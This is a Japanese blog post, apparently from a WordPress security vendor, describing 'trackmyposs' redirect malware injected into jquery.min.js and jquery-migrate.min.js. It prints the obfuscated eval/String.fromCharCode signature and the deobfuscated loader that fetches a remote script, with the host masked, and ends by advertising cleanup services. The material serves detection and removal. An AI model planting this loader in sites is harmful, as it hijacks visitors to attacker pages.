昨今ワードプレスのコアファイルにtrackmyposs で始まるJAVASCRIPT型のマルウェアの埋め込みが増えております。

ワードプレスにおけるリダイレクトハックとは?

リダイレクトハックとは、ワードプレスの何らかのファイルにハッカーが改ざんを加えて、サイトを訪問したユーザーを強制的に別のサイトに移動していしまうタイプのマルウェア(不正なプログラム)です。

ハッカーは管理者権限の奪取や、プラグインなどのプログラムの脆弱性を利用して、サイトのファイルを書き換えてこれらの不正プログラムを埋め込みます。

コアファイルにtrackmyposs で始まるJAVASCRIPT型のマルウェアの埋め込み

このマルウェアはワードプレスに含まれる下記のファイルの上部に不正なコードを差し込みます。

/wp-includes/js/jquery/jquery.min.js
/wp-includes/js/jquery/jquery-migrate.min.js
もしくはテーマやプラグインに含まれる上記同一ファイル名のJAVASCRIPT

不正なコードは下記のような形になっています。

/*trackmyposs*/eval(String.fromCharCode( 数字が続く

このコードは、String.fromCharCode で難読化したプログラムを元の実行可能なコードに戻し、eval関数で実行します。

jquery.min.jsとjquery-migrate.min.js は、ワードプレスのサイトの全頁で読み込まれることがあり、ユーザーがサイトの様々なページにアクセスすると実行されて別のサイトに強制的に飛ばされてしまいます。

難読化解除すると下記のようなコードになります。

var d=document;var s=d.createElement('script'); s.id="trackmyposs";
s.src=https://********/robots.js?v=3.1.3; 
if (document.currentScript) { 
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head')[0].appendChild(s);
}

※******** の部分は不正ファイルの配布元が入ります。

このコードはJAVASCRIPTの埋め込み要素を作り、外部から引っ張ってきた不正なリダイレクトハック用のコードをサイトのHEADに埋め込んで実行させていることがわかります。

マルウェアの検出と駆除

【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除] をお使いいただくと、trackmyposs マルウェアを干出と駆除が可能です。

また、このマルウェアが埋め込まれているという事は、管理者権限の奪取や、何らかの脆弱性をハッカーにされている為、その他サーバーにバックドアなどが埋め込まれている可能性もあります。

サーバー上の全ファイルの検査とマルウェア駆除が必要となる可能性もございます。

WordPress ワードプレスのマルウェア駆除・セキュリティー対策を経験豊かなプロフェッショナルが代行いたします。お気軽にご依頼・ご相談お送りください。